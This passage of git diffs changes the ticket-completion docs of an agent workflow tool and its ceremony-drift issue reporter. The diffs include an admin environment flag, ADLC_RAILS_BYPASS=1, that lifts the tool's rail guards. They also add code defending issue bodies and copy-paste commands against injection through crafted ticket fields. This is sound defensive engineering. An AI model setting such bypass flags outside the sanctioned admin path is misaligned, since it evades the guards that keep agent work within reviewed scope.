+  ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main
   ```
+  Deliberately no `--write`: that flag additionally tombstones rails-less stale
+  tickets, which the drift report above does not list, so the operator would be
+  writing outside the reviewed set. `--ceremony` alone completes the
+  rail-freezing tickets.
 
   `--ceremony` refuses to write without `ADLC_RAILS_BYPASS=1`. It adds
   `completed: true` to each rail-freezing shipped ticket (reported under

--- a/plugins/adlc-claude-code/commands/adlc-maintain.md
+++ b/plugins/adlc-claude-code/commands/adlc-maintain.md
@@ -66,22 +66,21 @@ adlc ticket-prune --json
   existing base tickets — so completion is reserved for the **protected-base
   admin ceremony**. Report the `needsCeremony` ids and their frozen rails.
 - **Completing them (admin, on `main` only).** After confirming each is genuinely
-  shipped, an admin runs the ceremony directly on a protected-base checkout of
-  `main` (it produces a diff an ordinary PR is denied, so it lands via the admin
+  shipped, an admin completes them **one id at a time** on a protected-base
+  checkout of `main` (the diff an ordinary PR is denied, so it lands via the admin
   path, like the manual sweep in PR #199):
 
   ```
-  ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main
+  adlc ticket complete <id> --write --authorize --json
   ```
-  Deliberately no `--write`: that flag additionally tombstones rails-less stale
-  tickets, which the drift report above does not list, so the operator would be
-  writing outside the reviewed set. `--ceremony` alone completes the
-  rail-freezing tickets.
 
-  `--ceremony` refuses to write without `ADLC_RAILS_BYPASS=1`. It adds
-  `completed: true` to each rail-freezing shipped ticket (reported under
-  `ceremonyCompleted`), expiring its rails per T36. Rails-less
-  `preexisting-completed-field` tickets are left reported, never rewritten.
+  Per-ticket by design: it names one id (no bulk recompute, no TOCTOU), goes
+  through the ticket-store transaction, records completion evidence to
+  `.adlc/manifest.jsonl`, and works on both the legacy and directory stores.
+  Completing a ticket adds `completed: true` and expires its rails (T36). A
+  `preexisting-completed-field` ticket carries a value someone set on purpose —
+  leave it unless you mean to override it. Do **not** use the deprecated bulk
+  `ticket-prune --ceremony` (evidence-less, legacy-store-only; #208).
 
 ## 4. Gate fuzzing — can hostile candidates defeat the gates? (calibration)
 

--- a/plugins/adlc-claude-code/commands/adlc-maintain.md
+++ b/plugins/adlc-claude-code/commands/adlc-maintain.md
@@ -74,7 +74,7 @@ adlc ticket-prune --json
   adlc ticket complete <id> --write --authorize --json
   ```
 
-  Per-ticket by design: it names one id (no bulk recompute, no TOCTOU), goes
+  Per-ticket by design: it names one id (no bulk recompute, no cross-ticket blast radius — though the id’s own version is still resolved at run time, so verify it is still genuinely done before completing; a revision-bound `--expect` is a planned follow-up), goes
   through the ticket-store transaction, records completion evidence to
   `.adlc/manifest.jsonl`, and works on both the legacy and directory stores.
   Completing a ticket adds `completed: true` and expires its rails (T36). A

--- a/plugins/adlc-cursor/command/adlc-maintain.md
+++ b/plugins/adlc-cursor/command/adlc-maintain.md
@@ -50,8 +50,13 @@ Run `adlc ticket-prune --json`.
   a protected-base checkout of `main` (the diff an ordinary PR is denied):
 
   ```
-  ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin/main
+  ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main
   ```
+  Deliberately no `--write`: that flag additionally tombstones rails-less stale
+  tickets, which the drift report above does not list, so the operator would be
+  writing outside the reviewed set. `--ceremony` alone completes the
+  rail-freezing tickets.
+
 
   `--ceremony` refuses to write without `ADLC_RAILS_BYPASS=1`; it adds
   `completed: true` to each rail-freezing shipped ticket (`ceremonyCompleted`),

--- a/plugins/adlc-cursor/command/adlc-maintain.md
+++ b/plugins/adlc-cursor/command/adlc-maintain.md
@@ -52,7 +52,7 @@ Run `adlc ticket-prune --json`.
   ```
   adlc ticket complete <id> --write --authorize --json
   ```
-  Per-ticket by design: it names one id (no bulk recompute, no TOCTOU), goes
+  Per-ticket by design: it names one id (no bulk recompute, no cross-ticket blast radius — though the id’s own version is still resolved at run time, so verify it is still genuinely done before completing; a revision-bound `--expect` is a planned follow-up), goes
   through the ticket-store transaction, records completion evidence to
   `.adlc/manifest.jsonl`, and works on both backends. Completing a ticket adds
   `completed: true` and expires its rails (T36). Do **not** use the deprecated

--- a/plugins/adlc-cursor/command/adlc-maintain.md
+++ b/plugins/adlc-cursor/command/adlc-maintain.md
@@ -50,17 +50,14 @@ Run `adlc ticket-prune --json`.
   a protected-base checkout of `main` (the diff an ordinary PR is denied):
 
   ```
-  ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main
+  adlc ticket complete <id> --write --authorize --json
   ```
-  Deliberately no `--write`: that flag additionally tombstones rails-less stale
-  tickets, which the drift report above does not list, so the operator would be
-  writing outside the reviewed set. `--ceremony` alone completes the
-  rail-freezing tickets.
+  Per-ticket by design: it names one id (no bulk recompute, no TOCTOU), goes
+  through the ticket-store transaction, records completion evidence to
+  `.adlc/manifest.jsonl`, and works on both backends. Completing a ticket adds
+  `completed: true` and expires its rails (T36). Do **not** use the deprecated
+  bulk `ticket-prune --ceremony` (evidence-less, legacy-store-only; #208).
 
-
-  `--ceremony` refuses to write without `ADLC_RAILS_BYPASS=1`; it adds
-  `completed: true` to each rail-freezing shipped ticket (`ceremonyCompleted`),
-  expiring its rails per T36.
 
 ## 4. Gate fuzzing — can hostile candidates defeat the gates? (calibration)
 Only if a gate suite exists at `.adlc/gate-suite.json` (without one the tool

--- a/plugins/adlc-opencode/command/adlc-maintain.md
+++ b/plugins/adlc-opencode/command/adlc-maintain.md
@@ -65,8 +65,12 @@ adlc ticket-prune --json
   tickets); an admin completes them on a protected-base checkout of `main`:
 
   ```
-  ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin/main
+  ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main
   ```
+  Deliberately no `--write`: that flag additionally tombstones rails-less stale
+  tickets, which the drift report above does not list, so the operator would be
+  writing outside the reviewed set. `--ceremony` alone completes the
+  rail-freezing tickets.
 
   `--ceremony` refuses to write without `ADLC_RAILS_BYPASS=1`; it adds
   `completed: true` to each rail-freezing shipped ticket (reported under

--- a/plugins/adlc-opencode/command/adlc-maintain.md
+++ b/plugins/adlc-opencode/command/adlc-maintain.md
@@ -65,16 +65,13 @@ adlc ticket-prune --json
   tickets); an admin completes them on a protected-base checkout of `main`:
 
   ```
-  ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main
+  adlc ticket complete <id> --write --authorize --json
   ```
-  Deliberately no `--write`: that flag additionally tombstones rails-less stale
-  tickets, which the drift report above does not list, so the operator would be
-  writing outside the reviewed set. `--ceremony` alone completes the
-  rail-freezing tickets.
-
-  `--ceremony` refuses to write without `ADLC_RAILS_BYPASS=1`; it adds
-  `completed: true` to each rail-freezing shipped ticket (reported under
-  `ceremonyCompleted`), expiring its rails per T36.
+  Per-ticket by design: it names one id (no bulk recompute, no TOCTOU), goes
+  through the ticket-store transaction, records completion evidence to
+  `.adlc/manifest.jsonl`, and works on both backends. Completing a ticket adds
+  `completed: true` and expires its rails (T36). Do **not** use the deprecated
+  bulk `ticket-prune --ceremony` (evidence-less, legacy-store-only; #208).
 
 ## 4. Gate fuzzing — NOT run automatically (needs a model AND a sandbox)
 

--- a/plugins/adlc-opencode/command/adlc-maintain.md
+++ b/plugins/adlc-opencode/command/adlc-maintain.md
@@ -67,7 +67,7 @@ adlc ticket-prune --json
   ```
   adlc ticket complete <id> --write --authorize --json
   ```
-  Per-ticket by design: it names one id (no bulk recompute, no TOCTOU), goes
+  Per-ticket by design: it names one id (no bulk recompute, no cross-ticket blast radius — though the id’s own version is still resolved at run time, so verify it is still genuinely done before completing; a revision-bound `--expect` is a planned follow-up), goes
   through the ticket-store transaction, records completion evidence to
   `.adlc/manifest.jsonl`, and works on both backends. Completing a ticket adds
   `completed: true` and expires its rails (T36). Do **not** use the deprecated

--- a/plugins/adlc-pi/prompts/adlc-maintain.md
+++ b/plugins/adlc-pi/prompts/adlc-maintain.md
@@ -51,7 +51,7 @@ Run `adlc ticket-prune --json`.
   ```
   adlc ticket complete <id> --write --authorize --json
   ```
-  Per-ticket by design: it names one id (no bulk recompute, no TOCTOU), goes
+  Per-ticket by design: it names one id (no bulk recompute, no cross-ticket blast radius — though the id’s own version is still resolved at run time, so verify it is still genuinely done before completing; a revision-bound `--expect` is a planned follow-up), goes
   through the ticket-store transaction, records completion evidence to
   `.adlc/manifest.jsonl`, and works on both backends. Completing a ticket adds
   `completed: true` and expires its rails (T36). Do **not** use the deprecated

--- a/plugins/adlc-pi/prompts/adlc-maintain.md
+++ b/plugins/adlc-pi/prompts/adlc-maintain.md
@@ -49,17 +49,14 @@ Run `adlc ticket-prune --json`.
   a protected-base checkout of `main` (the diff an ordinary PR is denied):
 
   ```
-  ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main
+  adlc ticket complete <id> --write --authorize --json
   ```
-  Deliberately no `--write`: that flag additionally tombstones rails-less stale
-  tickets, which the drift report above does not list, so the operator would be
-  writing outside the reviewed set. `--ceremony` alone completes the
-  rail-freezing tickets.
+  Per-ticket by design: it names one id (no bulk recompute, no TOCTOU), goes
+  through the ticket-store transaction, records completion evidence to
+  `.adlc/manifest.jsonl`, and works on both backends. Completing a ticket adds
+  `completed: true` and expires its rails (T36). Do **not** use the deprecated
+  bulk `ticket-prune --ceremony` (evidence-less, legacy-store-only; #208).
 
-
-  `--ceremony` refuses to write without `ADLC_RAILS_BYPASS=1`; it adds
-  `completed: true` to each rail-freezing shipped ticket (`ceremonyCompleted`),
-  expiring its rails per T36.
 
 ## 4. Gate fuzzing — can hostile candidates defeat the gates? (calibration)
 Only if a gate suite exists at `.adlc/gate-suite.json` (without one the tool

--- a/plugins/adlc-pi/prompts/adlc-maintain.md
+++ b/plugins/adlc-pi/prompts/adlc-maintain.md
@@ -49,8 +49,13 @@ Run `adlc ticket-prune --json`.
   a protected-base checkout of `main` (the diff an ordinary PR is denied):
 
   ```
-  ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin/main
+  ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main
   ```
+  Deliberately no `--write`: that flag additionally tombstones rails-less stale
+  tickets, which the drift report above does not list, so the operator would be
+  writing outside the reviewed set. `--ceremony` alone completes the
+  rail-freezing tickets.
+
 
   `--ceremony` refuses to write without `ADLC_RAILS_BYPASS=1`; it adds
   `completed: true` to each rail-freezing shipped ticket (`ceremonyCompleted`),

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -62,13 +62,19 @@ const DRY_RUN_CMD = 'adlc ticket-prune --base-ref origin/main        # dry run: 
 //     bypassed the lock, CAS, journal, and manifest evidence the directory
 //     contract requires, and was not "the same minimal diff" it claimed to be.
 //
+// The UMBRELLA command, `adlc ticket …`, not the package-internal `adlc-tickets`
+// bin. `@adlc/cli` publishes only the `adlc` binary; `adlc-tickets` is a
+// dependency bin not guaranteed on an operator's PATH, so a copy-pasted
+// `adlc-tickets …` can stop at `command not found` and leave rails frozen. `adlc
+// ticket` routes local/store verbs (including `complete`) to @adlc/tickets.
+//
 // `--json` is REQUIRED, not cosmetic: on a legacy store the CLI otherwise offers
 // an interactive migration before mutating (offerLegacyMigration, gated on a TTY
 // and `!--json`). An admin who accepted that prompt would migrate the WHOLE store
 // before completing one ticket — a repo-wide change outside the reviewed diff.
 // `--json` makes the command non-interactive, so it does exactly what is
 // advertised: complete one ticket, nothing else.
-const completeCmd = (id) => `adlc-tickets complete ${id} --write --authorize --json`;
+const completeCmd = (id) => `adlc ticket complete ${id} --write --authorize --json`;
 
 // A ticket id is interpolated into a copy-paste shell command in a bot-authored
 // issue. The id comes from the repo (a merged ticket), and the store validator
@@ -81,8 +87,17 @@ const completeCmd = (id) => `adlc-tickets complete ${id} --write --authorize --j
 // Must START with an alphanumeric, so an id can never be parsed as a flag
 // (`--authorize`, `-x`) even though those contain only otherwise-allowed
 // characters. Every real id qualifies (T7, A142, T-CC1, T-01KX…).
+// Length-bounded as well as charset-bounded. The store accepts arbitrarily long
+// ids, and a confirmed id is interpolated RAW into the fenced command (it must be
+// — the command has to name the real id), where mdField's display clamp does not
+// reach. A very long id would bloat the issue body and eventually exceed GitHub's
+// ~65_536-byte limit, failing every create/update and silently disabling the
+// reporter. 128 is far above any real id (the longest here is a 26-char ULID
+// suffix) and far below any single-field body-size risk.
+const MAX_TICKET_ID = 128;
 const SAFE_TICKET_ID = /^[A-Za-z0-9][A-Za-z0-9._-]*$/;
-const isRenderableId = (id) => typeof id === 'string' && SAFE_TICKET_ID.test(id);
+const isRenderableId = (id) =>
+  typeof id === 'string' && id.length <= MAX_TICKET_ID && SAFE_TICKET_ID.test(id);
 
 // Every ticket field rendered into the issue body is UNTRUSTED — ids, rails, and
 // reasons all trace back to a merged ticket, and the store accepts arbitrary
@@ -340,7 +355,7 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
               'indistinguishable from an active ticket editing existing files. Give each',
               'genuinely-done ticket an explicit done-`status` so it appears above, or, once',
               'you have verified one by hand, complete just that id:',
-              '`adlc-tickets complete <id> --write --authorize --json`.',
+              '`adlc ticket complete <id> --write --authorize --json`.',
               '',
             ]
           : []),

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -29,8 +29,9 @@
 import { execFileSync } from 'node:child_process';
 import { runTicketPrune } from '../packages/ticket-prune/lib/run.mjs';
 
-// Embedded in the body so the job can identify its own issue even if the label
-// is removed by hand, and so a human editing the issue can see it is managed.
+// The DURABLE identity of the managed issue. Labels can be stripped by hand; the
+// marker survives in the body, and findExistingIssue falls back to sweeping open
+// issues for it (then re-attaches the label).
 export const MARKER = '<!-- adlc:ceremony-drift -->';
 
 // Discovery is by LABEL, not by scanning recent issues. A bounded scan of the N
@@ -55,42 +56,78 @@ export function renderIssueBody(needsCeremony) {
     String(a?.id ?? '').localeCompare(String(b?.id ?? ''))
   );
 
-  const rows = entries.map((t) => {
-    const rails = Array.isArray(t?.rails) ? t.rails : [];
-    const railList = rails.length ? rails.map((r) => `\`${r}\``).join(', ') : '_(none recorded)_';
-    return [
-      `### ${t?.id ?? '(unknown id)'}`,
+  const rowsFor = (list) =>
+    list.map((t) => {
+      const rails = Array.isArray(t?.rails) ? t.rails : [];
+      const railList = rails.length ? rails.map((r) => `\`${r}\``).join(', ') : '_(none)_';
+      return [
+        `### ${t?.id ?? '(unknown id)'}`,
+        '',
+        `- **Blocker:** \`${t?.blocker ?? 'unknown'}\``,
+        `- **Frozen rails:** ${railList}`,
+        `- **Detected because:** ${t?.reason ?? '(no reason recorded)'}`,
+      ].join('\n');
+    });
+
+  // The two blockers need DIFFERENT remedies, and conflating them produces an
+  // issue that can never close: `ticket-prune --ceremony` completes only
+  // 'rails-freeze' entries. A 'preexisting-completed-field' ticket would require
+  // overwriting a deliberately-set `completed` value — a riskier field mutation
+  // kept deliberately out of scope (see run.mjs) — so it stays in needsCeremony
+  // no matter how many times the advertised command is run. Telling an operator
+  // that one command clears everything listed would be false instructions that
+  // never stop being wrong.
+  const railsFreeze = entries.filter((t) => t?.blocker === 'rails-freeze');
+  const manual = entries.filter((t) => t?.blocker !== 'rails-freeze');
+
+  const sections = [];
+
+  if (railsFreeze.length) {
+    sections.push(
+      `## Clearable by the ceremony (${railsFreeze.length})`,
       '',
-      `- **Blocker:** \`${t?.blocker ?? 'unknown'}\``,
-      `- **Frozen rails:** ${railList}`,
-      `- **Detected because:** ${t?.reason ?? '(no reason recorded)'}`,
-    ].join('\n');
-  });
+      'These have shipped but are still active and still freezing rails. Under T36 a',
+      "ticket's rails expire only when it is marked `completed: true`, so until then",
+      'they keep freezing paths for unrelated future work.',
+      '',
+      '`rails-guard-ci.assertBaseTicketContractsPreserved` denies field changes to',
+      'existing base tickets, so an ordinary PR cannot complete a railed ticket. This',
+      'is reserved for the protected-base admin ceremony:',
+      '',
+      '```bash',
+      CEREMONY_CMD,
+      '```',
+      '',
+      'Review the diff before pushing — it completes every ticket in *this* section.',
+      '',
+      ...rowsFor(railsFreeze),
+      ''
+    );
+  }
+
+  if (manual.length) {
+    sections.push(
+      `## Needs a manual decision (${manual.length})`,
+      '',
+      'These carry a `completed` field that is present but not `true`. The completion',
+      'ceremony will **not** clear them — completing them means overwriting a value',
+      'someone set deliberately, which it refuses to do by design. Decide per ticket',
+      'whether the field is stale (set it to `true` via the protected-base path) or',
+      'the ticket genuinely is not done (leave it, and it will keep being reported',
+      'here until it is completed or its scope changes).',
+      '',
+      ...rowsFor(manual),
+      ''
+    );
+  }
 
   return [
     MARKER,
     '',
-    'These tickets have shipped (their declared scope resolves to tracked files on',
-    '`main`) but are still active and still freezing rails. Under T36 a ticket\'s',
-    'rails expire only when it is marked `completed: true`, so until that happens',
-    'these rails keep freezing paths for unrelated future work.',
+    'Shipped tickets whose declared scope resolves to tracked files on `main`, but',
+    'which are still active in the ticket store.',
     '',
-    '## Why a PR cannot fix this',
-    '',
-    '`rails-guard-ci.assertBaseTicketContractsPreserved` denies field changes to',
-    'existing base tickets, so an ordinary PR cannot complete a railed ticket. This',
-    'is reserved for the protected-base admin ceremony:',
-    '',
-    '```bash',
-    CEREMONY_CMD,
-    '```',
-    '',
-    'Review the diff before pushing — it completes every ticket listed below.',
-    '',
-    `## Drifting tickets (${entries.length})`,
-    '',
-    ...rows,
-    '',
+    ...sections,
     '---',
     '',
     '_Maintained automatically by `.github/workflows/ceremony-drift.yml`. This issue',
@@ -98,10 +135,15 @@ export function renderIssueBody(needsCeremony) {
   ].join('\n');
 }
 
-/** Title reflects the count so the drift is legible from a notification alone. */
+/**
+ * Title reflects the count so the drift is legible from a notification alone.
+ * Deliberately does NOT say "freezing rails": a 'preexisting-completed-field'
+ * entry always has `rails: []` (ceremonyDisposition checks non-empty rails
+ * first), so that phrasing would be false whenever such an entry is present.
+ */
 export function renderIssueTitle(needsCeremony) {
   const n = (needsCeremony ?? []).length;
-  return `Ticket ceremony drift: ${n} shipped ticket${n === 1 ? '' : 's'} still freezing rails`;
+  return `Ticket ceremony drift: ${n} shipped ticket${n === 1 ? '' : 's'} awaiting completion`;
 }
 
 /**
@@ -155,12 +197,34 @@ function ensureLabel() {
     '--description', 'Shipped tickets whose rails have not expired (managed by ceremony-drift.yml)']);
 }
 
+// Sanity bound for the unlabeled sweep. Far above any plausible open-issue count
+// for this repo; if it is ever hit, the labeled lookup above is the load-bearing
+// path anyway.
+const SWEEP_LIMIT = 1000;
+
 function findExistingIssue() {
-  // Label-scoped, so this set contains only this job's own issue(s) — the limit
-  // is a sanity bound, not a search window (see LABEL above).
-  const raw = gh(['issue', 'list', '--state', 'open', '--label', LABEL, '--limit', '100',
-    '--json', 'number,title,body']);
-  return selectTrackingIssue(JSON.parse(raw));
+  // Fast path: label-scoped, so this set contains only this job's own issue(s)
+  // and stays deterministic no matter how large the repo gets.
+  const labeled = selectTrackingIssue(
+    JSON.parse(gh(['issue', 'list', '--state', 'open', '--label', LABEL, '--limit', '100',
+      '--json', 'number,title,body']))
+  );
+  if (labeled) return labeled;
+
+  // Fallback: the label can be removed by hand, and label-only lookup would then
+  // open a duplicate (active drift) or never close the stale issue (cleared
+  // drift). The marker is the durable identity, so sweep open issues for it.
+  // This path is what makes the marker an actual fallback rather than a claim.
+  const unlabeled = selectTrackingIssue(
+    JSON.parse(gh(['issue', 'list', '--state', 'open', '--limit', String(SWEEP_LIMIT),
+      '--json', 'number,title,body']))
+  );
+  if (!unlabeled) return null;
+
+  // Self-heal so the fast path works again next run.
+  gh(['issue', 'edit', String(unlabeled.number), '--add-label', LABEL]);
+  console.log(`ceremony-drift: re-attached '${LABEL}' to issue #${unlabeled.number}`);
+  return unlabeled;
 }
 
 async function main() {

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -43,8 +43,21 @@ export const MARKER = '<!-- adlc:ceremony-drift -->';
 // so lookup stays deterministic no matter how large the repo gets.
 export const LABEL = 'ceremony-drift';
 
+// NO `--write`. That flag widens the write set beyond what this report shows:
+// with it, runTicketPrune also TOMBSTONES rails-less stale tickets (completing
+// them), and those never appear here — the report is built from `needsCeremony`,
+// which covers only rail-freezing and preexisting-completed-field entries. A
+// rails-less ticket that is actually in progress but whose scope already resolves
+// would be marked completed by a command the operator ran on the strength of a
+// report that never listed it.
+//
+// `--ceremony` alone still completes the rail-freezing candidates (its branch in
+// run.mjs does not test `write`), so nothing is lost. Verified on a fixture with
+// one of each: with --write both are completed; without it, only the
+// rail-freezing one is, and the rails-less ticket is untouched. See the
+// end-to-end test in scripts/test/ceremony-drift-exit.test.mjs.
 const CEREMONY_CMD =
-  'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin/main';
+  'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main';
 
 /**
  * Render the tracking-issue body. Deterministic: entries are sorted by id, so an

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -84,6 +84,27 @@ const completeCmd = (id) => `adlc-tickets complete ${id} --write --authorize --j
 const SAFE_TICKET_ID = /^[A-Za-z0-9][A-Za-z0-9._-]*$/;
 const isRenderableId = (id) => typeof id === 'string' && SAFE_TICKET_ID.test(id);
 
+// Every ticket field rendered into the issue body is UNTRUSTED — ids, rails, and
+// reasons all trace back to a merged ticket, and the store accepts arbitrary
+// strings. Interpolating them raw into Markdown lets a crafted value break out of
+// its heading or code span: a newline can start a NEW block — including a ```bash
+// fence containing an authoritative-looking command — and structural characters
+// can forge links or headings. The runnable-command allow-list (SAFE_TICKET_ID)
+// only guards the command line; this guards every OTHER place a field is shown.
+//
+// Two-layer defense:
+//   1. remove ALL control characters (newlines, tabs, CR) — without a line break
+//      no new block, fence, heading, or standalone line can be introduced at all;
+//   2. escape the inline-Markdown metacharacters that remain, so a value cannot
+//      forge a code span, link, or emphasis within its own line.
+// Applied to every interpolated field. Values are also clamped in length so one
+// pathological ticket cannot dominate the issue.
+const mdField = (value, { max = 200 } = {}) =>
+  String(value ?? '')
+    .replace(/[\u0000-\u001f\u007f]/g, ' ') // (1) strip control chars -> no new blocks
+    .replace(/[\\`*_{}\[\]()#+!|<>]/g, (c) => `\\${c}`) // (2) escape inline-MD metacharacters
+    .slice(0, max)
+
 /**
  * Render the tracking-issue body. Deterministic: entries are sorted by id, so an
  * unchanged drift set always produces a byte-identical body and decideAction can
@@ -98,13 +119,14 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
   const rowsFor = (list) =>
     list.map((t) => {
       const rails = Array.isArray(t?.rails) ? t.rails : [];
-      const railList = rails.length ? rails.map((r) => `\`${r}\``).join(', ') : '_(none)_';
+      // Each field is sanitized: ids/rails/reasons are untrusted (see mdField).
+      const railList = rails.length ? rails.map((r) => `\`${mdField(r)}\``).join(', ') : '_(none)_';
       return [
-        `### ${t?.id ?? '(unknown id)'}`,
+        `### ${t?.id != null ? mdField(t.id) : '(unknown id)'}`,
         '',
-        `- **Blocker:** \`${t?.blocker ?? 'unknown'}\``,
+        `- **Blocker:** \`${mdField(t?.blocker ?? 'unknown')}\``,
         `- **Frozen rails:** ${railList}`,
-        `- **Detected because:** ${t?.reason ?? '(no reason recorded)'}`,
+        `- **Detected because:** ${t?.reason != null ? mdField(t.reason) : '(no reason recorded)'}`,
       ].join('\n');
     });
 
@@ -329,7 +351,9 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
               '`[A-Za-z0-9._-]`). No command is shown for them, deliberately — an id is',
               'interpolated into copy-paste shell, and a crafted id could inject. Complete',
               'them through tooling that takes the id as a real argument, and consider',
-              `renaming: ${unsafeIds.map((t) => '`' + String(t?.id) + '`').join(', ')}.`,
+              // These ids failed SAFE_TICKET_ID, so they DO contain metacharacters —
+              // sanitizing here is the whole point, not a formality.
+              `renaming: ${unsafeIds.map((t) => '`' + mdField(t?.id) + '`').join(', ')}.`,
               '',
             ]
           : []),

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -17,9 +17,11 @@
 // hard failure would therefore block every contributor on drift none of them can
 // fix, and the only unblock would be an admin sweep — a gate people learn to
 // route around. (Habituating operators to a bypass is the erosion #162 was
-// about; this must not recreate it.) So this reports into a tracking issue and
-// always exits 0. The authoritative, unbypassable rail enforcement stays in
-// scripts/rails-guard-ci.mjs.
+// about; this must not recreate it.) So this reports into a tracking issue, and
+// the mere EXISTENCE of drift never fails the job. An operational failure of the
+// reporter itself (revoked token, gh/API error) DOES exit non-zero — see the
+// exit-code contract at the bottom. The authoritative, unbypassable rail
+// enforcement stays in scripts/rails-guard-ci.mjs.
 //
 // Idempotence is the whole design constraint: an unchanged drift set must leave
 // the issue untouched, or the signal becomes noise and gets muted.
@@ -27,9 +29,17 @@
 import { execFileSync } from 'node:child_process';
 import { runTicketPrune } from '../packages/ticket-prune/lib/run.mjs';
 
-// Embedded in the body so the job can find its own issue without needing a label
-// to exist, survive being renamed, or depend on search ranking.
+// Embedded in the body so the job can identify its own issue even if the label
+// is removed by hand, and so a human editing the issue can see it is managed.
 export const MARKER = '<!-- adlc:ceremony-drift -->';
+
+// Discovery is by LABEL, not by scanning recent issues. A bounded scan of the N
+// most recent open issues silently breaks both contracts once the tracker ages
+// out of the window: non-empty drift opens a duplicate, and cleared drift never
+// finds the issue to close, leaving a false warning open forever. Filtering by a
+// dedicated label means the result set only ever contains this job's own issue,
+// so lookup stays deterministic no matter how large the repo gets.
+export const LABEL = 'ceremony-drift';
 
 const CEREMONY_CMD =
   'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin/main';
@@ -139,17 +149,27 @@ export function decideAction({ drift, existingIssue }) {
 const gh = (args, input) =>
   execFileSync('gh', args, { encoding: 'utf8', input, maxBuffer: 10 * 1024 * 1024 });
 
+/** Idempotent; --force makes re-creating an existing label a no-op. */
+function ensureLabel() {
+  gh(['label', 'create', LABEL, '--force', '--color', 'B60205',
+    '--description', 'Shipped tickets whose rails have not expired (managed by ceremony-drift.yml)']);
+}
+
 function findExistingIssue() {
-  const raw = gh(['issue', 'list', '--state', 'open', '--limit', '100', '--json', 'number,title,body']);
+  // Label-scoped, so this set contains only this job's own issue(s) — the limit
+  // is a sanity bound, not a search window (see LABEL above).
+  const raw = gh(['issue', 'list', '--state', 'open', '--label', LABEL, '--limit', '100',
+    '--json', 'number,title,body']);
   return selectTrackingIssue(JSON.parse(raw));
 }
 
 async function main() {
   const result = runTicketPrune({ cwd: process.cwd(), baseRef: process.env.BASE_REF || 'origin/main' });
   if (!result.ok) {
-    // Report and exit 0: this job is a reporter, never a gate. A prune failure
-    // must not redden main — rails-guard-ci is the check that may.
+    // OPERATIONAL failure — the reporter itself could not do its job. This must
+    // be loud (see the exit-code contract in main's catch below).
     console.error(`ceremony-drift: could not compute drift — ${result.error}`);
+    process.exitCode = 1;
     return;
   }
 
@@ -162,10 +182,11 @@ async function main() {
     return;
   }
 
+  ensureLabel();
   const decision = decideAction({ drift, existingIssue: findExistingIssue() });
   switch (decision.action) {
     case 'open': {
-      const url = gh(['issue', 'create', '--title', decision.title, '--body-file', '-'], decision.body).trim();
+      const url = gh(['issue', 'create', '--title', decision.title, '--label', LABEL, '--body-file', '-'], decision.body).trim();
       console.log(`ceremony-drift: opened ${url}`);
       break;
     }
@@ -186,7 +207,20 @@ async function main() {
 // Only run main() when executed directly, so the test can import the pure parts.
 if (process.argv[1] && import.meta.url === `file://${process.argv[1]}`) {
   main().catch((e) => {
-    // Never fail the workflow: see the "NOT A BLOCKING GATE" note above.
+    // EXIT-CODE CONTRACT — two different failures, deliberately treated apart:
+    //
+    //   drift EXISTS            -> exit 0. Not a malfunction; it is the normal
+    //                             finding, and failing on it would recreate the
+    //                             blocking-gate problem this job exists to avoid.
+    //   the REPORTER is broken  -> exit 1. A revoked token, a gh/API failure, or
+    //                             a CLI incompatibility must be visible.
+    //
+    // The earlier version swallowed both, reasoning "a reporter must never fail".
+    // That rationale only ever applied to the first case: this workflow does not
+    // run on pull_request, so a non-zero exit blocks nobody — it just surfaces a
+    // broken job. Swallowing the second case let the reporter die silently while
+    // every scheduled run still looked green, which defeats its only purpose.
     console.error(`ceremony-drift: ${e.message}`);
+    process.exitCode = 1;
   });
 }

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -27,8 +27,6 @@
 // the issue untouched, or the signal becomes noise and gets muted.
 
 import { execFileSync } from 'node:child_process';
-import { existsSync } from 'node:fs';
-import { join } from 'node:path';
 import { runTicketPrune } from '../packages/ticket-prune/lib/run.mjs';
 import { resolveActiveTicketId } from '../packages/tickets/lib/pointer.mjs';
 
@@ -45,21 +43,29 @@ export const MARKER = '<!-- adlc:ceremony-drift -->';
 // so lookup stays deterministic no matter how large the repo gets.
 export const LABEL = 'ceremony-drift';
 
-// NO `--write`. That flag widens the write set beyond what this report shows:
-// with it, runTicketPrune also TOMBSTONES rails-less stale tickets (completing
-// them), and those never appear here — the report is built from `needsCeremony`,
-// which covers only rail-freezing and preexisting-completed-field entries. A
-// rails-less ticket that is actually in progress but whose scope already resolves
-// would be marked completed by a command the operator ran on the strength of a
-// report that never listed it.
+// The read-only review command. Always safe to run; it only prints the drift set.
+const DRY_RUN_CMD = 'adlc ticket-prune --base-ref origin/main        # dry run: review the set';
+
+// The completion command is PER-TICKET and canonical, not a bulk sweep.
 //
-// `--ceremony` alone still completes the rail-freezing candidates (its branch in
-// run.mjs does not test `write`), so nothing is lost. Verified on a fixture with
-// one of each: with --write both are completed; without it, only the
-// rail-freezing one is, and the rails-less ticket is untouched. See the
